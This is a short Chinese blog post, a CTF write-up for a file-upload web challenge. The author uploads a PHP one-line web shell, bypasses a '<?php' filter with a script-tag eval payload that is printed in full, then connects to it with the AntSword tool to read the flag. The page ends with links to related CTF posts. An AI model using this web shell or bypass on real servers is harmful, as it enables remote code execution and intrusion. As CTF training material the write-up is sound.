CTF日记之web题目(入门题目)

最新推荐文章于 2024-09-09 17:05:16 发布
最新推荐文章于 2024-09-09 17:05:16 发布
阅读量219 收藏
点赞数
分类专栏: php ctf 文章标签: php web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sunleibaba/article/details/113002203
版权
ctf 同时被 2 个专栏收录
9 篇文章 0 订阅
订阅专栏
php
8 篇文章 0 订阅
订阅专栏

CTF日记:百度杯”CTF比赛 九月场 Upload

在这里插入图片描述

打开题目,发现是一道上传题:
在这里插入图片描述
我们上传了一句话木马的php文件,发现了上传的路径
在这里插入图片描述
然后查看2.php文件,发现开头的“<?php”被过滤了。

在这里插入图片描述
那我们就换个一句话木马。
<script language="pHp">@eval($_POST['123'])</script>,这样 ?和php就都被绕过了,再次上传试试看。

用中国蚁剑连接试试看,发现成功了!

在这里插入图片描述

找到flag.php,打开就得到了flag。

在这里插入图片描述

二哈它爸
关注
专栏目录
南邮CTF练习题——web
dcison的博客
11-11 4万+
南邮CTF部分题解
CTFWeb各种题目的解题姿势PPT模板
02-21
CTFWeb各种题目的解题姿势PPT模板
CTF比赛web安全题型讲解
白帽子凯哥聊黑客
12-11 3186
CTF(Capture The Flag)竞赛Web安全题目是测试参赛者对Web应用漏洞利用和防御能力的重要环节。
CTFWeb题目的常见题型及解题方法
最新发布
徐徐徐的博客
09-09 2075
双写顾名思义就是将被过滤的关键字符写两遍,比如,如果要添加XSS Payload,又需要插入标签,就可以构造如下的Payload:来绕过对标签的单次过滤限制。如果过滤了某个必须要用的字符串,输入的内容是以GET方式获取的(也就是直接在地址栏输入),可以采用url编码绕过的方式。SQL注入是一种灵活而复杂的攻击方式,归根结底还是考察对SQL语言的了解和根据输入不同数据网页的反应对后台语句的判断,当然也有sqlmap这样的自动化工具可以使用。
CTF_WEB(习题)
若比邻的博客
12-15 5271
一、bugku_web_cookie欺骗:https://ctf.bugku.com/challenges/detail/id/87.html 地址栏filename一看为base64,解密为keys.php 尝试index.php加密为base64:aW5kZXgucGhw,读取一下,啥也没有 观察地址栏,将line赋值为1试试,发现是将index.php按行读取了 将index.php读取出来,读读取结果 #cookies欺骗 import requests php=""
CTF web基础题
m0_51426816的博客
01-10 556
BugkuCTF web2 要求输入验证码为两位数,但是长度限制为1位 直接更改长度限制,然后输入答案得到flag 攻防世界 web 新手练习区 get-post 在地址栏直接添加/?a=1 在火狐浏览器使用Hackbar(我用的是Max Hackbar),F12进入 提交得到flag ...
CTF-Web基础题
weixin_52182264的博客
04-21 6710
CTF-Web基础题
CTF Web各种题目的解题姿势
07-27
课时6:CTF SQL基于约束注入原理与利用12'22 课时7:SQL注入基于时间注入的原理与利用50'13 课时8:SQL基于时间盲注的Python自动化解题22'45 课时9:Sqlmap自动化注入工具介绍23'47 课时10:Sqlmap自动化注入...
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
CTF竞赛100题,优质题目
06-28
CTF竞赛100题,优质题目
CTF工具之WEB.zip
10-07
【标题】:CTF工具之WEB.zip 【正文】: CTF(Capture The Flag)是一项网络安全竞赛,参与者通过解决各种安全挑战来展示他们的技术技能。这个名为“CTF工具之WEB.zip”的压缩包,显然是专门为参与此类比赛的选手...
CTF web安全经典例题讲解
10-22
该内容为CTF赛题web安全经理例题讲解,包含sql注入,密码学、文件上传,提权、抓包改包等多种题型讲解,图文结合,适合新手学习。
CTF wed安全(攻防世界)练习题_ctfweb题目
2401_84578953的博客
08-07 1011
phps 文件就是 php 的源代码文件,通常用于提供给用户(访问者)查看 php 代码,因为用 户无法直接通过 Web 浏览器看到 php 文件的来内容,所以需要用 phps 文件代替。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
记一次院赛CTFWEB题(入门级别)
热门推荐
CTF小白的博客
04-14 2万+
目录签到一签到二口算小天才easy php录取查询我爱pythonSpring 这次院赛的题目比较基础,适合给刚入门CTF的小白提供一个大致CTF解题思路。(主要因为本人小白,表示能学到不少东西。) 签到一 题目直接给了flag,提交就可以了。 签到二 这题主要考察的是基本的F12能力,查看网页源码,以及修改input输入框的长度。 口算小天才 这题通过题意,是需要让我们在1~3秒内回答...
CTFWeb方向练习题)(持续更新)
m0_56010012的博客
02-23 5409
1.Training-WWW-Robots 打开应用场景,如下: 网址后面添加/robots.txt 查看其内容(robots协议也叫robots.txt(统一小写)是一种存放于网站根目录下的ASCII编码的文本文件),内容如下: 根据提示,访问/fl0g.php,得到flag值。 ...
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 1084
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
CTFshow的Web题目wp(持续更新)
苦行僧的妖孽日常
08-15 928
CTFshow的Web题目wp(持续更新)
ctf飞机大战web题目
09-01
CTF(Capture The Flag)的飞机大战是一种常见的Web题目,通常涉及到前端页面的交互和后端逻辑的漏洞利用。这类题目一般要求参赛者通过分析网页和数据包,找到游戏的漏洞或逻辑缺陷,进而实现控制游戏结果或获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

二哈它爸

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值